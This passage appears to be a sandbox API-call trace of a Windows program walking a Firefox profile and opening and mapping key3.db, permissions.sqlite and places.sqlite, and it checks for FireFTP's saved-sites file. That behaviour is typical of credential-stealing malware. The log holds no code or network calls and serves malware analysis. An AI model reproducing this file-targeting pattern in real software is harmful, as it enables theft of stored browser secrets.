lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpDst=0x2ee1c78, nSize=0x88 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 0x88 [0590.477] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x670 [0590.477] CloseHandle (hObject=0x670) returned 1 [0590.477] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x670 [0590.477] GetFileSize (in: hFile=0x670, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x258000 [0590.477] CreateFileMappingW (hFile=0x670, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4dc [0590.478] MapViewOfFile (hFileMappingObject=0x4dc, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0590.496] UnmapViewOfFile (lpBaseAddress=0x3800000) returned 1 [0590.500] CloseHandle (hObject=0x4dc) returned 1 [0590.500] CloseHandle (hObject=0x670) returned 1 [0590.500] LocalFree (hMem=0x2ee1c78) returned 0x0 [0590.500] LocalFree (hMem=0x2ee1ae0) returned 0x0 [0590.500] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d34c | out: lpFindFileData=0x52d34c) returned 0 [0590.500] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0590.500] LocalFree (hMem=0x63fe58) returned 0x0 [0590.500] LocalFree (hMem=0x63fcf0) returned 0x0 [0590.500] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5c4 | out: lpFindFileData=0x52d5c4) returned 0 [0590.500] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0590.500] LocalFree (hMem=0x63fa28) returned 0x0 [0590.500] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.500] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 0 [0590.500] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.500] LocalFree (hMem=0x56cab0) returned 0x0 [0590.500] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.500] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.500] lstrlenW (lpString="\\") returned 1 [0590.500] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.500] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.500] lstrlenW (lpString="key3.db") returned 7 [0590.500] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.500] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x63bbf0 [0590.500] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.501] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.501] CloseHandle (hObject=0x668) returned 1 [0590.501] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x54 [0590.501] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x63bd28 [0590.501] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db", lpDst=0x63bd28, nSize=0x54 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db") returned 0x54 [0590.501] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.501] CloseHandle (hObject=0x668) returned 1 [0590.501] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.501] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4000 [0590.501] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.501] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.501] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.501] CloseHandle (hObject=0x66c) returned 1 [0590.501] CloseHandle (hObject=0x668) returned 1 [0590.502] LocalFree (hMem=0x63bd28) returned 0x0 [0590.502] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.502] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.502] lstrlenW (lpString="\\") returned 1 [0590.502] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.502] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.502] lstrlenW (lpString="localstore.rdf") returned 14 [0590.502] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.502] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56cab0 [0590.502] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.502] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.502] CloseHandle (hObject=0x668) returned 1 [0590.502] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0590.502] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x2ed9860 [0590.502] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf", lpDst=0x2ed9860, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf") returned 0x5b [0590.502] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.502] CloseHandle (hObject=0x668) returned 1 [0590.502] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.502] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4fe [0590.502] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.502] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.502] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.503] CloseHandle (hObject=0x66c) returned 1 [0590.503] CloseHandle (hObject=0x668) returned 1 [0590.503] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.503] LocalFree (hMem=0x56cab0) returned 0x0 [0590.503] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.503] lstrlenW (lpString="\\") returned 1 [0590.503] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.503] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.503] lstrlenW (lpString="marionette.log") returned 14 [0590.503] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.503] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56cab0 [0590.503] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.503] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.503] CloseHandle (hObject=0x668) returned 1 [0590.503] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0590.503] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x2ed9860 [0590.503] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log", lpDst=0x2ed9860, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log") returned 0x5b [0590.503] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.503] CloseHandle (hObject=0x668) returned 1 [0590.503] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.503] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x39 [0590.503] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.503] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.503] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.504] CloseHandle (hObject=0x66c) returned 1 [0590.504] CloseHandle (hObject=0x668) returned 1 [0590.504] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.504] LocalFree (hMem=0x56cab0) returned 0x0 [0590.504] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.504] lstrlenW (lpString="\\") returned 1 [0590.504] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.504] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.504] lstrlenW (lpString="mimeTypes.rdf") returned 13 [0590.504] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.504] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.504] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.504] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.504] CloseHandle (hObject=0x668) returned 1 [0590.504] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0590.504] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x2ed9860 [0590.504] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf", lpDst=0x2ed9860, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf") returned 0x5a [0590.504] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.504] CloseHandle (hObject=0x668) returned 1 [0590.504] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.504] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xef3 [0590.504] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.504] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.504] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.505] CloseHandle (hObject=0x66c) returned 1 [0590.505] CloseHandle (hObject=0x668) returned 1 [0590.505] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.505] LocalFree (hMem=0x56cab0) returned 0x0 [0590.505] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.505] lstrcmpiW (lpString1="minidumps", lpString2=".") returned 1 [0590.505] lstrcmpiW (lpString1="minidumps", lpString2="..") returned 1 [0590.505] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.505] lstrlenW (lpString="\\") returned 1 [0590.505] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.505] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.505] lstrlenW (lpString="minidumps") returned 9 [0590.505] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.505] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x63bbf0 [0590.505] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.505] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps") returned 85 [0590.505] lstrlenW (lpString="\\*.*") returned 4 [0590.505] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps") returned 85 [0590.505] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.505] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps\\*.*", lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 0x5b9b50 [0590.505] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.505] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 1 [0590.505] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.505] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.505] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 0 [0590.505] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.505] LocalFree (hMem=0x56cab0) returned 0x0 [0590.505] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.505] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.505] lstrlenW (lpString="\\") returned 1 [0590.505] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.505] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.505] lstrlenW (lpString="parent.lock") returned 11 [0590.505] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.505] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bbf0 [0590.505] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.505] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.505] CloseHandle (hObject=0x668) returned 1 [0590.506] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0590.506] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bd28 [0590.506] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock", lpDst=0x63bd28, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock") returned 0x58 [0590.506] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.506] CloseHandle (hObject=0x668) returned 1 [0590.506] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.506] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0590.506] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0590.506] CloseHandle (hObject=0x668) returned 1 [0590.506] LocalFree (hMem=0x63bd28) returned 0x0 [0590.506] StrStrIW (lpFirst="parent.lock", lpSrch="fireFTPsites.dat") returned 0x0 [0590.506] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.506] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.506] lstrlenW (lpString="\\") returned 1 [0590.506] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.506] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.506] lstrlenW (lpString="permissions.sqlite") returned 18 [0590.506] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.506] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56cab0 [0590.506] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.506] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.506] CloseHandle (hObject=0x668) returned 1 [0590.506] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5f [0590.506] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x2ed9860 [0590.506] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite", lpDst=0x2ed9860, nSize=0x5f | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite") returned 0x5f [0590.506] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.506] CloseHandle (hObject=0x668) returned 1 [0590.506] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.506] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10000 [0590.506] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.506] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.507] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.507] CloseHandle (hObject=0x66c) returned 1 [0590.507] CloseHandle (hObject=0x668) returned 1 [0590.507] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.507] LocalFree (hMem=0x56cab0) returned 0x0 [0590.507] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.508] lstrlenW (lpString="\\") returned 1 [0590.508] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.508] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.508] lstrlenW (lpString="places.sqlite") returned 13 [0590.508] lstrlenW 